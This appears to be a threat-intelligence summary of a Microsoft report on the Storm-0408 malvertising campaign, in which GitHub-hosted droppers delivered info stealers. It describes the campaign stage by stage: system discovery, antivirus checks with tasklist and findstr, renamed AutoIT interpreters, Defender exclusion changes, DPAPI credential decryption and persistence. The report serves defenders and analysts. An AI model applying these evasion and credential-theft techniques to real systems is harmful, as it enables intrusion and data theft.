Malvertising Campaign Abuses GitHub to Distribute Info Stealers

Summary

Microsoft published a blog detailing a large-scale malvertising campaign detected in December 2024 by Microsoft Threat Intelligence. The attack impacted nearly one million devices globally, targeting both consumer and enterprise users. It originated from illegal streaming websites with malvertising redirectors, leading victims to an intermediary site before redirecting them to GitHub, Discord, and Dropbox.

GitHub was the primary platform used to deliver initial access payloads, storing malware that deployed additional files and scripts. These files followed a modular, multi-stage approach to payload delivery, execution, and persistence. The malware collected system information and facilitated data exfiltration. This activity is tracked as Storm-0408, a group known for using phishing, SEO poisoning, and malvertising to distribute remote access and info-stealing malware. Microsoft analyzed the redirection chain and payloads used in the campaign.

Technical Details

Since early December 2024, multiple hosts downloaded first-stage payloads from malicious GitHub repositories after being redirected through a complex chain. The attack originated from illegal streaming websites that embedded malvertising redirectors within movie frames to generate revenue. These redirectors led users through multiple intermediary sites before ultimately directing them to GitHub, where malware was hosted.

The first-stage payload, hosted on GitHub, acted as a dropper for additional malicious files. The second-stage payload gathered system information, encoding it in Base64 and transmitting it via HTTP. It collected details like memory size, OS, screen resolution, and user paths. The third-stage payloads varied based on the second-stage drop, often enabling command and control (C2), further downloads, data exfiltration, and defense evasion. The full redirection chain involved multiple layers, with Microsoft researchers confirming malvertising redirectors were embedded in iframes on illegal streaming sites.

TOnce redirected to GitHub, the malware hosted there established an initial foothold on victims' devices, acting as a dropper for additional payloads. These payloads primarily included information stealers like Lumma Stealer and an updated version of Doenerium, which were designed to collect system and browser data. In some cases, NetSupport, a remote monitoring and management (RMM) tool, was also deployed.

Threat actors leveraged various scripts, including PowerShell, JavaScript, VBScript, and AutoIT, alongside living-off-the-land binaries (LOLBAS) such as PowerShell.exe, MSBuild.exe, and RegAsm.exe for command and control (C2) and data exfiltration. The attack followed a modular and multi-stage approach, with each stage deploying new payloads for system discovery, browser credential extraction, and execution of obfuscated scripts.

Persistence was achieved through registry modifications and adding shortcuts to the Windows Startup folder. The overall campaign involved multiple stages of malware deployment, data collection, and exfiltration to C2 servers. While not all payloads followed an identical sequence, most incidents followed this structured attack chain.

First stage Payload

In the first stage of the attack, a payload was delivered from GitHub to establish a foothold on the compromised device. As of mid-January 2025, these payloads were digitally signed with newly created certificates, though twelve such certificates were later revoked. The initial payloads dropped multiple legitimate files to aid later-stage malware execution. These files included archives storing second-stage payloads, Electron application files, multimedia and graphicsrelated DLLs, privilege escalation tools, and components from software installers like NSIS and .NET Framework.

Among the dropped files were app-64.7z (storing additional payloads), elevate.exe (used for privilege escalation), and various DLLs linked to multimedia and graphics applications. Some files were repurposed for persistence and stealthy execution.
Microsoft observed variations in second-stage payloads and different delivery techniques depending on the specific first-stage payload deployed on the infected device.

Second stage Payload

The second-stage payload focuses on system discovery and exfiltrating collected data to the command and control (C2) server. It gathers details such as memory size, graphics card specifications, screen resolution, operating system version, user paths, and a reference to its own file name.
To retrieve system information, it queries the Windows registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName for the OS version. Additionally, it runs commands like echo %COMPUTERNAME% and echo %USERDOMAIN% to obtain the device and domain names. The collected system data is then Base64-encoded and sent as a query parameter to a designated IP address for further exploitation.

Third stage Payload

The second-stage payload executes third-stage malware using the command prompt with the /c flag for quick execution and termination. The third-stage executable drops a .cmd file, which is then launched via cmd.exe. This script initiates system discovery by running tasklist to list active processes and findstr to check for security software, targeting antivirus solutions like Webroot, Avast, and Bitdefender.

Additionally, the .cmd script merges multiple files into a single-character filename using cmd /c copy /b, which is later used in further execution. The third-stage payload then generates an AutoIT v3 interpreter file, renamed with a .com extension, to evade detection. The .cmd script triggers the execution of this modified AutoIT file against the single-character binary, continuing the attack chain. Most second-stage payloads follow this structured multi-step approach, with some dropping multiple executables that adhere to the same execution process.

Fourth stage Payload

Fourth-stage .com files, such as Alexandria[.]com, Kills[.]com, and Briefly[.]com, perform persistence, process injection, remote debugging, and data exfiltration. Alexandria[.]com drops a .scr (AutoIT interpreter) and a .js file to maintain persistence using a Startup folder shortcut or scheduled tasks. It can initiate C2 connections, enable Chrome/Edge remote debugging, and create TCP listening sockets. Affiliated[.]com focuses on browser monitoring and remote debugging, making network connections to Telegram, Let’s Encrypt, and C2 domains while decrypting DPAPI-stored credentials. Briefly[.]com extends this functionality by capturing screenshots, exfiltrating data, and running PowerShell scripts while connecting to Pastebin and other C2 domains.

These files use LOLBAS techniques (e.g., RegAsm.exe) for C2 over TCP (ports 15647 or 9000), data exfiltration, keystroke monitoring, and DPAPI decryption. They access browser data (cookies, login data) and user files from OneDrive, Documents, and Downloads, adapting their attack based on system security settings.

Third stage PowerShell Analysis

Third-stage PowerShell scripts execute obfuscated commands to download additional payloads, establish persistence, and exfiltrate system data while avoiding detection. They use curl -silent and -ExecutionPolicy Bypass to remain stealthy. Some scripts collect system details, send them to C2 servers, and download NetSupport RAT for remote access. Others modify TLS settings, leverage MSBuild.exe for Chrome remote debugging, and scan for security tools or cryptocurrency wallets. Persistence is ensured through registry modifications and startup folder shortcuts.

Fourth stage PowerShell Analysis

The renamed AutoIT file drops an obfuscated PowerShell script that modifies Microsoft Defender exclusions to evade detection. The script executes Base64-encoded PowerShell commands to send web requests to 360[.]net and baidu[.]com before downloading a file from a malicious domain. The downloaded data is saved as a null.zip archive in the Temp directory for further execution.

Conclusion

The attack campaign attributed to Storm-0408 follows a multi-stage infection chain, leveraging AutoIT scripts, PowerShell commands, and LOLBins to establish persistence, evade detection, and exfiltrate sensitive data. By modifying Microsoft Defender exclusions, executing obfuscated scripts, and deploying renamed executables, the attackers ensure stealth and prolonged system access. The use of remote debugging, credential theft, and network connections to C2 servers enables extensive post-exploitation activities. The complexity and adaptability of the techniques highlight Storm-0408's sophistication and ability to bypass security defenses.